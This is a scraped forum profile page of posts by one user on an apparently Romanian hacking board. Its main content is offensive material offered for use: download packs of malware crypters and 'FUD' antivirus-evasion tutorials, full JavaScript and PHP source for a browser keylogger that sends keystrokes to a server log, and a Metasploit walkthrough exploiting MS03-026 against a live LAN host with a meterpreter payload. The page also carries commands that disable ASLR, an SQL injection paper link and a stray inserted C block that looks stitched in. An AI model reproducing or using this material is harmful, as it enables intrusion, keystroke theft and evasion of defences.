Everything posted by Nytro
-
RAR 1 01 - DarkAvengard Crypter (Open source Code Crypter > p0ke >> Moded) 02 - h4ck-y0u.org crypter by DuSTY 03 - L0rD Crypter by haZl0oh 04 - AT4RE aSm Protecter 1.0 by Mouradpr 05 - AverCryptor 1.02 beta by os1r1s 06 - Cryptic 2.1 by Tughack 07 - Crew Crypter by North-Team 08 - Mortal Team Crypter 2.0 by Ras 09 - NOmeR1 by NOmeR1 and P.S. 10 - Poly! Crypt 2.8 by BUNG 11 - PowerCrypt 2.0 by N47RON 12 - Private Krypt 1.0 beta by t0pP8uZz 13 - PE Protector 0.9.2 CRYPToCRACK's by Lukas Fleischer 14 - Russian Cryptor 1.0 by master3 15 - SimbiOZ 2.1 by Extranger 16 - Snoop Crypt by snoop 17 - Zelda Crypt by snoop 18 - WinOfCrypt 1.0 by DarkPressure 19 - X-Crypter 1.2 Security-Bypass Version mod by Mareek 20 - X-Crypter 1.2 Private Version by x-zer0 RAR 2 01 - Break-Into-Pattern, a.k.a BIP, v.0.1 by Icingtaupe (ASM source) 02 - Crypter v.3.1 by SLESH 2007 (Delphi source) 03 - FFC v.1.6 Public by Juza 04 - File Crypter Pro by Aphex (Delphi source) 05 - GKrpto v.1.0 by User-99 06 - Open Source Code Crypter v.1.0 by p0ke (Delphi source) 07 - Open source file crypter (ass crypter) by assoftware (Delphi source) 08 - Pecrypt by archphase (Delphi source) 09 - Pscrambler v.1.2 by p0ke (Delphi source) 10 - Smokes Crypter v1.2 (Delphi source) 11 - Cigicigi File Crypter v1.0 by turkojan 12 - iPBProtect v0.1.5 beta [****] by Forgat 13 - MaskPE v.2.0 by yzkzero 14 - PEncrypt v.4.0 by JunkCode 15 - Perplex v.1.01dev by BliZZaRD 16 - SkD Undetectabler 2.0beta by skdrat 17 - ExeSax v.0.9.1 GUI 18 - VB-PE-Crypt 1.0 by Flo 19 - UnderGround Crypter v.1.0 by Booster2ooo 20 - Daemon Crypt v.2 Public by Evil_Inside RAR 3 01 - SCE v.0.5 (Silly Chr Encrypter) by sevenC 02 - SSE v.0.5 (Simple Streverse Encryption) by sevenC 03 - Vbsencrypter v.0.01 by K 04 - File Crypter by valdir_salguei ro (from brasil - source code included) 05 - RCryptor by Vaska - included versions 1.1+1.3+1.3b+1.4+1.5+1.6b+1.6d 06 - iNF[CRYPT] by LESHIY & [nht] 07 - CryptoFilez v.2.0 by Mr.Ded 08 - Morphnah Beta2 by 
pyccxak.com Kas 09 - Pohernah v.1.0.2 by pyccxak.com Kas 10 - Pohernah v.1.0.3 by pyccxak.com Kas 11 - RPolyCrypt v.1.0b by Vasca 12 - StrAnGe CrYpTeR by TiPiaX (source code included) 13 - DalKrypt v1.0 by DalKiT (source code included) 14 - fEaRz Crypter v.1.0 beta1 by fEaRz 15 - Icrypt v.1.0 by BuGGz 16 - Minke v.1.0.1 by Codius 17 - Scramble Tool v0.2.3b By System33r (k0nsl) 18 - USC by p0ke - included versions 1.2D+2.1+2.1.1+Patch for 2.1.1 19 - NoodleCrypt 2 by NoodleSpa 20 - Werus Crypter v.1.0 Public version by pyccxak.com Kas All: Download: http://rs222.rapidshare.com/files/94316443/PackCrypters.rar
-
I'm still thinking about it. What if, instead of posting a program, someone wrote: "If anyone wants it, add me at plm_hackeru" or something like that? Anyway, I will decide that depending on the situation.
-
Details? A spammer for messenger? One that sends a lot of messages, or one where you log in and it sends a mass message, something like that? Or some kind of booter?
-
Ok guys, I'm sure some people will agree with me here. These 3 tuts are by far the best I have ever seen on how to make whatever it is you're trying UD, undetected by quite a few AVs. If you combine these techniques and learn how to do them correctly you could possibly make a program near FUD or FUD. Anyway, these 3 tuts helped me a lot and I thought I'd share them. They also explain to you what to do very clearly, have links to the tools you need and also have pictures showing you what to do. So it isn't just any nooby tuts, it's professional ones. The credits are at the beginning of the tuts when you open them. Please note that if anyone needs help with any of the tuts or doesn't understand some bits, please just post it up and I'll get back to you as soon as possible. Credits to Icarus. Download: http://www.2shared.com/file/7090483/b58610b6/Pack.html
-
Assembly Language Basics Tutorial
-------------------------------------
By Aro

*Intro:
Hey, it's Aro and this is my first tutorial. This basic assembly tutorial shows the basic things you need to know. I had this idea that there are other people like me who are still learning and want someone to learn with, so I made this tutorial for people to learn along with me so we can all spread information. If anyone knows about assembly, please correct me if there is anything wrong in my tutorial. I need feedback; it will let me know what I need to do to be better. Hope you like it.
Aro.

This tutorial contains the following information:
*System Organization Basics
*CPU
*CPU Registers
*Stack

System Organization Basics:
-------------------------------------

CPU (aka Central Processing Unit):
-------------------------------------
*Control Unit: Retrieves/decodes instructions, retrieves/stores data in memory.
*Execution Unit: Actual execution of instructions.
*Register: Internal memory locations used as variables.
*Flags: Used to indicate various "events" when execution is happening.

CPU Registers:
-------------------------------------
Registers are internal memory locations used as variables. A register is 32 bits long, or 4 bytes. There are 8 registers: EAX, EBX, ECX, EDX, ESI, EDI, ESP, and EBP. The "E" at the beginning of all the registers indicates that it is a 32 bit register.

General Purpose Registers
-------------------------------------
*EAX (Accumulator Register): Generally used for storing operands and result data.
*EBX (Base Register): Used for storing pointers to data. Only register that can be used as an index.
*ECX (Counter Register): Used for loop operations.
*EDX (Data Register): Used as an input/output pointer.
*ESI, EDI (Pointer): Data pointer registers for memory operations, generally used for string operations.
*ESP (Pointer): Stack Pointer Register.
*EBP (Pointer): Stack Data Pointer Register.

32 bit registers can be split into 16 bit. In 16 bit programs only the lowest bits of the registers are used. They have the same names as the general registers but without the "E".
example: AX, BX, CX, DX, SI, DI, SP, BP.
The 16 bit register can be split into a high byte and a low byte.
example: EAX is 32 bit, AX is the lowest 16 bits of EAX, and then AX can be split into AH (high byte) and AL (low byte), which are one byte in size.

Segment Registers
-------------------------------------
*CS (Code segment) - 16 bit number that points to the active code segment
*DS (Data segment) - 16 bit number that points to the active data segment
*SS (Stack segment) - 16 bit number that points to the active stack segment
*ES (Extra segment) - 16 bit number that points to the active extra segment
*EIP (32 bit instruction pointer) points to the instruction being done.
*A control register is a processor register which changes or controls the general behavior of a CPU or other digital device. Common tasks performed by control registers include interrupt control, switching the addressing mode, paging control, and coprocessor control. Check http://en.wikipedia.org/wiki/Control_register for more information.

Virtual Memory Model:
Every process is laid out in the same virtual memory space; it doesn't matter what the actual memory location is. Every process that runs in the system seems like it's running independently. There is a security feature in Linux 2.6 and higher that's called "randomize_va_space"; this feature protects against buffer overflows. randomize_va_space uses space randomization if set to 1 (true), which is the default; to disable it, change it to 0 (false). This will be helpful to practice on buffer overflows. If you have Windows don't do this, though I recommend you get Linux such as Ubuntu (even a live CD); it would help if you really want to get good at this. But if you want to get a disassembler, get NASM for Windows.

To disable the Linux patch (only do the stuff above if you want to or are going to practice doing buffer overflow attacks):

    cat /proc/sys/kernel/randomize_va_space
    echo 0 > /proc/sys/kernel/randomize_va_space
    cat /proc/sys/kernel/randomize_va_space

Only do the stuff above if you want to or are going to practice doing buffer overflow attacks.^^^

Program Memory:
-------------------------------------
*The first segment is the .text segment. This segment contains the actual program; the executable instructions are located here.
*The second segment is the .data. This is where any data that has been initialized with a value is held.
example:
    .data
    Int32:
        .int 2
*The third segment is the .bss. This is where unused data is held.
example:
    .bss
        .comm Buffer, 1024
*The third segment is the heap. The heap is where the virtual memory space is located.
*The fourth segment is just unused memory.
*The fifth segment is the Stack, which is generally used for storing function arguments and local variables. The stack is located in the highest memory location possible. It generally goes down the memory from highest to lowest memory. The stack is a last in, first out data structure, otherwise known as LIFO (Last In First Out).

The Stack
-------------------------------------
As I said before, a stack is a temporary storage unit in computer memory where function arguments and local variables are stored. The LIFO principle is: the last value you put in is the first that comes out. Just imagine you have a stack of papers. When I wanted my teacher to correct my test first, I would wait until everybody finished, so when I put my test on her desk I could sneak a peek at my score or how many red marks are on my test when she starts correcting it as we walk out of class. When you PUSH two values on the stack you will get the last one first because of that method.

PUSH - pushes value on stack
POP - removes from stack
ESP - Points to stack

Example of LIFO Principle (REMEMBER, MUST KNOW LIFO):
Right here is an example of a stack. The ESP register holds 0x000008 which is the top of the stack.
example: ESP 0x0000008
The stack adds a new value (0x0000007) and (0x0000006) using the PUSH operation.
example: PUSH 0x0000007 PUSH 0x0000006
Now we update the ESP pointer to the top of the stack to the address 0x00000006.
example: ESP 0x0000006
Now we use the POP operation to take that value off the stack, which removes the last value put onto the stack (LIFO, REMEMBER).
example: POP 0x00000006
Next we have to update the ESP pointer to value 0x0000007.
example: ESP 0x00000007
Next we have to POP the last first value we put in off the stack. (LIFO)
example: POP 0x00000007
Finally we update the ESP pointer register to the top of the stack.
example: ESP 0x0000008

Now I hope you understand the LIFO principle; if you don't, leave a question. Or Google.com, it's the best hacking site. If you don't understand or I explained something wrong, leave a message. Someone who knows Assembly or I will hopefully answer. I'll write part two later. Please leave feedback, good or bad. I don't care. I need to get better.

Assembly Language Basics Tutorial
Aro Out
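The PUSH/POP sequence and the EAX/AX/AH/AL split from the tutorial, traced with the arithmetic a 32-bit x86 CPU performs (ESP holds an address and moves by 4 bytes per PUSH or POP). This is an added example, not part of Aro's tutorial; the stack top address 0x1000, the 64-byte stack size and all function names are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model, not real hardware: 64 bytes of "stack memory" ending
   just below STACK_TOP. All names and addresses here are illustrative. */
#define STACK_TOP   0x00001000u              /* ESP value when the stack is empty */
#define STACK_SIZE  64u
#define STACK_LIMIT (STACK_TOP - STACK_SIZE) /* lowest usable address */

typedef struct {
    uint8_t  mem[STACK_SIZE];  /* mem[i] models the byte at address STACK_LIMIT + i */
    uint32_t esp;              /* address of the most recently pushed dword */
} cpu_t;

void cpu_init(cpu_t *c) {
    memset(c->mem, 0, sizeof c->mem);
    c->esp = STACK_TOP;
}

/* PUSH imm32: ESP = ESP - 4, then store the value at [ESP], little-endian.
   Returns 0 on success, -1 if the modelled stack is full. */
int cpu_push(cpu_t *c, uint32_t value) {
    if (c->esp - STACK_LIMIT < 4u) return -1;
    c->esp -= 4u;                       /* the stack grows toward lower addresses */
    uint32_t off = c->esp - STACK_LIMIT;
    for (unsigned i = 0; i < 4; i++)
        c->mem[off + i] = (uint8_t)(value >> (8u * i));
    return 0;
}

/* POP r32: load the dword at [ESP], then ESP = ESP + 4.
   Returns 0 on success, -1 if the stack is empty. */
int cpu_pop(cpu_t *c, uint32_t *out) {
    if (STACK_TOP - c->esp < 4u) return -1;
    uint32_t off = c->esp - STACK_LIMIT;
    uint32_t v = 0;
    for (unsigned i = 0; i < 4; i++)
        v |= (uint32_t)c->mem[off + i] << (8u * i);
    *out = v;
    c->esp += 4u;
    return 0;
}

/* Sub-register views: AX is the low 16 bits of EAX, AH and AL the high and
   low bytes of AX. Writing AL leaves the upper 24 bits of EAX untouched. */
uint16_t reg_ax(uint32_t eax) { return (uint16_t)(eax & 0xFFFFu); }
uint8_t  reg_ah(uint32_t eax) { return (uint8_t)((eax >> 8) & 0xFFu); }
uint8_t  reg_al(uint32_t eax) { return (uint8_t)(eax & 0xFFu); }
uint32_t write_al(uint32_t eax, uint8_t al) { return (eax & 0xFFFFFF00u) | al; }

int main(void) {
    cpu_t c;
    uint32_t v = 0;
    cpu_init(&c);
    printf("start    ESP=0x%08X\n", (unsigned)c.esp);
    cpu_push(&c, 7); printf("PUSH 7   ESP=0x%08X\n", (unsigned)c.esp);
    cpu_push(&c, 6); printf("PUSH 6   ESP=0x%08X\n", (unsigned)c.esp);
    cpu_pop(&c, &v); printf("POP -> %u ESP=0x%08X\n", (unsigned)v, (unsigned)c.esp);
    cpu_pop(&c, &v); printf("POP -> %u ESP=0x%08X\n", (unsigned)v, (unsigned)c.esp);

    uint32_t eax = 0x12345678u;
    printf("EAX=0x%08X AX=0x%04X AH=0x%02X AL=0x%02X\n", (unsigned)eax,
           (unsigned)reg_ax(eax), (unsigned)reg_ah(eax), (unsigned)reg_al(eax));
    printf("after writing AL=0xFF: EAX=0x%08X\n", (unsigned)write_al(eax, 0xFF));
    return 0;
}
```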
-
E-Book

Table of Contents
[Abstract]
[Introduction]
[Obtaining Information Using Error Messages]
[Leveraging Further Access]
  [xp_cmdshell]
  [xp_regread]
  [Other Extended Stored Procedures]
  [Linked Servers]
  [Custom extended stored procedures]
  [Importing text files into tables]
  [Creating Text Files using BCP]
  [ActiveX automation scripts in SQL Server]
[Stored Procedures]
[Advanced SQL Injection]
  [Strings without quotes]
  [Second-Order SQL Injection]
  [Length Limits]
  [Audit Evasion]
[Defences]
  [Input Validation]
  [SQL Server Lockdown]
[References]
Appendix A - 'SQLCrack'
  (sqlcrack.sql)

Download: http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
-
Researchers will release an open source tool at Black Hat USA that helps forensics investigators reconstruct attacks that use a popular Metasploit payload to cover its tracks.

Mandiant's Steve Davis and Peter Silberman have developed an "anti-" anti-forensics tool, of sorts, tentatively called the Metasploit Forensics Framework, which they'll demonstrate at the security conference later this month. The tool is aimed at unmasking what Metasploit's stealthy Meterpreter did on a machine.

Meterpreter lets developers write code in DLL files and execute everything in memory -- without writing anything to the victim machine's disk, where it could be detected and, in turn, complicate incident response. Meterpreter can be used to download and upload files, execute code, and open its own command shell, the researchers say. Their new tool can tell if a Meterpreter packet is still in memory, and, if so, which files Meterpreter has accessed, and whether it has modified a registry key.

Some traditional antivirus tools can't detect Meterpreter-borne attacks because they never hit the disk, the researchers say. "You wouldn't see the attacks happen if they didn't write anything to disk," says Steve Davis, one of the researchers and a consultant with Mandiant. "We are going to show how we can reconstruct a crime scene in memory."

The Metasploit Forensics Framework is a proof-of-concept tool that scans the processes in memory. "Meterpreter has unique packets...and we can identify those and reconstruct its processes," says Peter Silberman, an engineer on the product team at Mandiant. "We're going to discuss how Meterpreter looks in memory, and how it's able to circumvent traditional tools [for forensics]. We'll demonstrate how with some advanced knowledge, you can reconstruct what commands were sent to Meterpreter and perform an autopsy on an attack."

Memory analysis in forensics has only begun to catch on tool-wise in the past year or so, the researchers say. Their tool helps investigators pull useful information from memory to help in their forensics work, they say. "This is just a small research project in how freed memory can still pull out a lot of useful information on the commands [an attacker] used," for example, Silberman says.

The researchers say they fully expect the Metasploit developers to come up with a workaround for their tool in short order once it's released. They plan to make the tool available on Mandiant's Website the day of their Black Hat presentation so attendees can experiment with it during their talk, they say.
-
You're going to end up a criminal... Ban!
-
I can make a tool of some kind, just give me ideas. Oh, and it shouldn't take much work, I get bored quickly.
-
I searched so long for a working one... I think it works well. Download: http://www.freeproxy.ru/download/P_Checker.exe
-
If it's the one I know, I don't like it. I mean, the macro trick is old. And in 95% of cases it won't work. A lot could be done if it did work...
-
I will restart the warnings campaign. You will get a warning if you:
- revive an old topic for no reason - Check the date of the last post yourselves
- post your ID - Discussions take place on the forum
- post in the wrong category - Think a little before opening a topic and select the right category. All requests go in CERERI, not in Programe Hack or anywhere else.
The old reasons for warnings also still apply, especially off-topic. At 3 warnings, a one-week ban, depending on the mood I'm in. If something doesn't suit you, you can bang your ass on the ground.
-
Ban. Look at the dates of the last posts.
-
Download: http://www.2shared.com/file/7084370/1c5af5a1/BOF.html
-
By reiluke kl.js function GetCandy(event) { var kreiluke = “”; var isNetscape = (navigator.appName.indexOf(”Netscape”) != -1); var kreiluke = (isNetscape) ? String.fromCharCode(event.which) : String.fromCharCode(event.keyCode); makeRequest(’kl.php?iambr=’ + kreiluke); } function makeRequest(url) { var httpRequest; if (window.XMLHttpRequest) { // Mozilla, Safari, … httpRequest = new XMLHttpRequest(); if (httpRequest.overrideMimeType) { httpRequest.overrideMimeType(’text/xml’); } } else if (window.ActiveXObject) { // IE try { httpRequest = new ActiveXObject(”Msxml2.XMLHTTP”); } catch (e) { try { httpRequest = new ActiveXObject(”Mcft.XMLHTTP”); } catch (e) {} } } if (!httpRequest) { alert(’Giving up Cannot create an XMLHTTP instance’); return false; } httpRequest.onreadystatechange = function() { alertContents(httpRequest); }; httpRequest.open(’GET’, url, true); httpRequest.send(null); } function alertContents(httpRequest) { if (httpRequest.readyState == 4) { if (httpRequest.status == 200) { } else { alert(’There was a problem with the request.’); } } } kl.php <?php $_GET[’iambr’]; $file = fopen($_SERVER[’REMOTE_ADDR’] . “-logged.txt”,”a”); fwrite($file,$_GET[’iambr’]); fclose($file); ?> testpage.html <!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN” “http://www.w3.org/TR/html4/loose.dtd”> <html> <head> <SCRIPT language=”JavaScript” SRC=”kl.js”></SCRIPT> </head> <body onkeyup=”GetCandy(event)”> <p>press a ~censored~ key at it will be logged</p> </body> </html>
-
Changes:
*AJAX rendering techniques
*Browser compliance! Designed for Internet Explorer 6 & 7, Firefox, Opera, Seamonkey, Safari
*The code is smaller; I made it too big with useless stuff in 2.0
*The javascript no longer acts on the page loading time if the source feed is offline or times out; simply choose when it will load the remote feed by adding update_ModuleX(); anywhere on your page, preferably in the footer.
*PHP proxy (this is optional, see post #2 in this thread)

What is it:
This is a simple javascript code which you can copy and paste on your website to stay informed about the various public exploits. I started building it 2 years ago from a basic code made by sophos, then with str0ke's cooperation I got the idea to port it for milw0rm, rewriting it with AJAX styles, and that's what it is now. I think I won't update it much because it is now running perfectly, maybe a few minor updates to enhance the browser compatibility.

How to use it:
The code below is the sample code for the remote exploits section in milw0rm. If you would like to display other sections like dos, local, webapps, just change the configuration settings in the header of the code and replace all occurrences of milalerts1 with the milalerts# defined for each section. You should know that they are defined like this on milw0rm.com:
remote exploits = milalerts1
local exploits = milalerts2
webapps exploits = milalerts3
dos exploits = milalerts4
You should have only 10 occurrences to change; with a quick editor that's fast to achieve.

//update: I forgot to mention, if you would like to display several milw0rm modules on the same web page, you must remember to rename all occurrences of _Module1 to _Module# where # is a unique number from 2 to 4 for example; this will work around some functions that could be mixed up between the modules.
Code: PHP Code: <script type="text/javascript"> // Layout settings var feed_Module1 = 'http://milw0rm.com/js/3.0/remote.php' // news url var table_border_Module1 = '0' // table border size (default:0) var table_width_Module1 = '175' // table width, in % or px (default:100%) var table_cspacing_Module1 = '1' // table cellspacing (default:1) var table_cpadding_Module1 = '0' // table cellpadding (default:0) var table_bgcolour_Module1 = '#000000' // table background colour (default:#000000) var table_bdcolour_Module1 = '#000000' // table border colour (default:#000000) var table_bgpic_Module1 = '' // table background picture (default:none) var table_align_Module1 = 'left' // table horizontal alignement, LEFT | RIGHT (default:left) var table_hspace_Module1 = '0' // table horizontal space (default:0) var table_vspace_Module1 = '0' // table vertical space (default:0) var table_height_Module1 = '0' // table height (default:0) var header_align_Module1 = 'left' // header horizontal alignement, LEFT | CENTER | MIDDLE | RIGHT (default:left) var header_valign_Module1 = '' // header vertical alignement, TOP | MIDDLE | CENTER | BOTTOM | BASELINE (default:none) var header_height_Module1 = '0' // header height (default:0) var header_bgcolour_Module1 = '#000000' // header background colour (default:#000000) var header_tcolour_Module1 = '#FFFFFF' // header text colour (default:#FFFFFF) var header_ttheme_Module1 = '' // header text theme (default:Eras Medium ITC) var header_tsize_Module1 = '1' // header text size (default:0) var header_title1_Module1 = 'remote exploits' // header plural title var header_title2_Module1 = 'remote exploit' // header singular title var column1_align_Module1 = 'center' // column1 alignement, LEFT | CENTER | MIDDLE | RIGHT (default:center) var column1_valign_Module1 = '' // column1 vertical alignement, TOP | MIDDLE | CENTER | BOTTOM | BASELINE (default:none) var column1_height_Module1 = '0' // column1 height (default:0) var column1_bgcolour_Module1 = 
'#918484' // column1 background colour (default:#918484) var column1_tcolour_Module1 = '#000000' // column1 text colour (default:#000000) var column1_ttheme_Module1 = '' // column1 text theme (default:Arial Narrow) var column1_tsize_Module1 = '1' // column1 text size (default:0) var column2_width_Module1 = '' // column2 width, in % or px (default:90%) var column2_align_Module1 = 'left' // column2 horizontal alignement, LEFT | CENTER | MIDDLE | RIGHT (default:left) var column2_valign_Module1 = '' // column2 vertical alignement, TOP | MIDDLE | CENTER | BOTTOM | BASELINE (default:none) var column2_height_Module1 = '0' // column2 height (default:0) var column2_bgcolour_Module1 = '#004000' // column2 background colour (default:#004000) var column2_tcolour_Module1 = '#00C000' // column2 text colour (default:#00C000) var column2_hcolour_Module1 = '#D6EF39' // column2 highlight color, to highlight newly added milw0rm exploits (default:#D6EF39) var column2_ttheme_Module1 = '' // column2 header text theme (default:Arial Narrow) var column2_tsize_Module1 = '1' // column2 text size (default:0) // Functional settings var count_column_Module1 = '2' // column count, 1 or 2 (default:2) var count_Module1 = 10 // news count, 1 to 10 (default:10) var adjust_length_Module1 = 'no' // news length correction 'yes' or 'no' (default:yes) var adjust_var_Module1 = 55 // maximum characters count after what the correction is made (default:75) // **********************no modifications required after******************************* var b_Module1 = '..'; var htmltxt_Module1 = ""; var base_colour_Module1 = column2_tcolour_Module1; var font_header_Module1 = '+ header_tsize_Module1 + '" face="' + header_ttheme_Module1 + '" color="' + header_tcolour_Module1 + '">'; var font_column1_Module1 = '+ column1_tsize_Module1 + '" face="' + column1_ttheme_Module1 + '" color="' + column1_tcolour_Module1 + '">'; var font_column2_Module1 = '+ column2_tsize_Module1 + '" face="' + column2_ttheme_Module1 + '" 
color="' + column2_tcolour_Module1 + '">'; var milalerts1; function wait_Module1(millis_Module1) { var date_Module1 = new Date(); var curDate_Module1 = null; do { curDate_Module1 = new Date(); } while(curDate_Module1-date_Module1 < millis_Module1); } function error_Module1() { for (var lid_Module1=1,i_Module1=0;i_Module1<10;i_Module1++,lid_Module1++) { document.getElementById('link_Module1'+ lid_Module1).innerHTML= font_column2_Module1 + 'Timeout, refresh'; } return; } function refresh_Module1() { for (var lid_Module1=1,i_Module1=0;i_Module1<40;i_Module1+=4,lid_Module1++) { document.getElementById('link_Module1'+ lid_Module1).innerHTML= font_column2_Module1 + 'Refreshing...'; } update_Module1(); return; } function update_Module1() { wait_Module1(0); scriptTag_Module1 = document.getElementById('Script_Module1'); headID_Module1 = document.getElementsByTagName("head")[0]; if(scriptTag_Module1) {headID_Module1.removeChild(document.getElementById('Script_Module1'));} newScript_Module1 = document.createElement('script'); newScript_Module1.type = 'text/javascript'; newScript_Module1.src = feed_Module1 + "?" 
+ Math.random(); //IE7 refresh patch to avoid caching newScript_Module1.id = 'Script_Module1'; newScript_Module1.defer = false; headID_Module1.appendChild(newScript_Module1); newScript_Module1.onreadystatechange=function() { if(newScript_Module1.readyState=="loaded"){ scriptLoaded_Module1(); return; } } newScript_Module1.onload=function() { scriptLoaded_Module1(); return; } if(newScript_Module1.readyState=="loaded") { //Opera patch scriptLoaded_Module1(); return; } return; } function scriptLoaded_Module1() { wait_Module1(100); if (milalerts1==null) { error_Module1(); return; } for (var lid_Module1=1,i_Module1=0;i_Module1<40;i_Module1+=4,lid_Module1++) { if (milalerts1[i_Module1+3]=='1'){ column2_tcolour_Module1 = column2_hcolour_Module1;font_column2_Module1 = '+ column2_tsize_Module1 + '" face="' + column2_ttheme_Module1 + '" color="' + column2_tcolour_Module1 + '">'; } if (adjust_length_Module1 == "yes") { var a_Module1 = milalerts1[i_Module1+1]; if (a_Module1.length > adjust_var_Module1) document.getElementById('link_Module1'+ lid_Module1).innerHTML='+ milalerts1[i_Module1+2] + '" target="_blank" style="text-decoration: none">' + font_column2_Module1 + a_Module1.substr(0,adjust_var_Module1) + b_Module1 + ''; else document.getElementById('link_Module1'+ lid_Module1).innerHTML='+ milalerts1[i_Module1+2] + '" target="_blank" style="text-decoration: none">' + font_column2_Module1 + milalerts1[i_Module1+1] + ''; } else document.getElementById('link_Module1'+ lid_Module1).innerHTML='+ milalerts1[i_Module1+2] + '" target="_blank" style="text-decoration: none">' + font_column2_Module1 + milalerts1[i_Module1+1] + ''; if (count_column_Module1 != "1") { document.getElementById('date_Module1'+ lid_Module1).innerHTML='' + font_column1_Module1 + milalerts1[i_Module1+0] + ''; } column2_tcolour_Module1 = base_colour_Module1; font_column2_Module1 = '+ column2_tsize_Module1 + '" face="' + column2_ttheme_Module1 + '" color="' + column2_tcolour_Module1 + '">'; } lid_Module1=1; 
i_Module1=0; return; } if (count_column_Module1 == "1") { colspan_Module1 = 1; } else { colspan_Module1 = 2; } if (count_Module1 > 0) { if (count_Module1 > 10) {count_Module1 = 10} htmltxt_Module1 += '\n+ table_align_Module1 + '" width="' + table_width_Module1 + '" cellspacing="' + table_cspacing_Module1 + '" cellpadding="' + table_cpadding_Module1 + '" border="' + table_border_Module1 + '" bordercolor="' + table_bdcolour_Module1 + '" bgcolor="' + table_bgcolour_Module1 + '" background="' + table_bgpic_Module1 + '" hspace="' + table_hspace_Module1 + '" vspace="' + table_vspace_Module1 + '" height="' + table_height_Module1 + '">'; htmltxt_Module1 += '\n"; } else { htmltxt_Module1 += 'Latest ' + count_Module1 + ' ' + header_title1_Module1 + "from milw0rm"; } for (var i_Module1=0, lid_Module1=1; i_Module1<count_Module1*4; i_Module1+=4, lid_Module1++) { if (count_column_Module1 == "1") { htmltxt_Module1 += '\n'; column1_tcolour_Module1 = base_colour_Module1; font_column1_Module1 = '+ column1_tsize_Module1 + '" face="' + column1_ttheme_Module1 + '" color="' + column1_tcolour_Module1 + '">'; } else { htmltxt_Module1 += '\n'; column2_tcolour_Module1 = base_colour_Module1; font_column2_Module1 = '+ column2_tsize_Module1 + '" face="' + column2_ttheme_Module1 + '" color="' + column2_tcolour_Module1 + '">'; } } } else { document.write("=== MILW0RM info feed error: Specify value of count > 0 ==="); } htmltxt_Module1 += '\n + header_align_Module1 + '" valign="' + header_valign_Module1 + '" height="' + header_height_Module1 + '" colspan="' + colspan_Module1 + '" bgcolor="' + header_bgcolour_Module1 + '">' + font_header_Module1 + '' + font_header_Module1 + '|about' + font_header_Module1 + 'refresh'; if (count_Module1 == 1) { htmltxt_Module1 += 'Latest ' + header_title2_Module1 + "from milw0rm + column2_align_Module1 + '" valign="' + column2_valign_Module1 + '" height="' + column2_height_Module1 + '" bgcolor="' + column2_bgcolour_Module1 + '"> + lid_Module1 + '">' + 
font_column2_Module1 + 'Updating... + column1_align_Module1 + '" valign="' + column1_valign_Module1 + '" height="' + column1_height_Module1 + '" bgcolor="' + column1_bgcolour_Module1 + '">' + font_column1_Module1 + ' +lid_Module1+'">' + lid_Module1 + ' + column2_align_Module1 + '" valign="' + column2_valign_Module1 + '" height="' + column2_height_Module1 + '" width="' + column2_width_Module1 + '" bgcolor="' + column2_bgcolour_Module1 + '"> + lid_Module1 + '">' + font_column2_Module1 + 'Updating... '; document.write(htmltxt_Module1); update_Module1(); by matthews
-
Here is what you receive with 20 SEO Secrets: 1. A 18 minute video showing you exactly how to use the tools with ease. 2. SEO Manifesto. This is a 12 minute audio rant about how easy search engine optimization is and how you can slap the search engines back! 3. A 55 page PDF with the 20 tools and explanations of how to use them properly. The 20th tool is a 30 page list of resources that will make your seo a breeze. 4. A copy of Ross’s SEO Diamond Ebook to make sure you understand everything you need to know about SEO! Download: http://hotfile.com/dl/7683043/bc3e1b2/20_SEO_Secrets.rar.html
-
This is an old exploit but it still works. I have tested it on the local area network here. This exploit was tested on Windows XP Service Pack 1.

[o] DCOM RPC Exploit (ms03_026_dcom)

# Description
This module exploits a stack overflow in the RPCSS service, this vulnerability was originally found by the Last Stage of Delirium research group and has been widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request

root@ubuntu:~# ping 172.16.1.31
PING 172.16.1.31 (172.16.1.31) 56(84) bytes of data.
64 bytes from 172.16.1.31: icmp_seq=1 ttl=128 time=2.09 ms
64 bytes from 172.16.1.31: icmp_seq=2 ttl=128 time=0.335 ms
64 bytes from 172.16.1.31: icmp_seq=3 ttl=128 time=0.342 ms
^C
--- 172.16.1.31 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 0.335/0.922/2.091/0.826 ms

root@ubuntu:~# nmap -O -PN 172.16.1.31

Starting Nmap 4.62 ( http://nmap.org ) at 2009-06-21 09:56 WIT
Interesting ports on ******-******.kapukvalley.net (172.16.1.31):
Not shown: 1710 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
5000/tcp open  upnp
MAC Address: 00:1C:F0:5A:98:AF (D-Link)
Device type: general purpose
Running: Microsoft Windows 2000
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.860 seconds

root@ubuntu:~# cd /home/noge/pentest/metasploit/
root@ubuntu:/home/noge/pentest/metasploit# ./msfconsole

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|

       =[ msf v3.3-dev
+ -- --=[ 378 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 154 aux

msf > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms03_026_dcom) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(ms03_026_dcom) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms03_026_dcom) > set TARGET 0
TARGET => 0
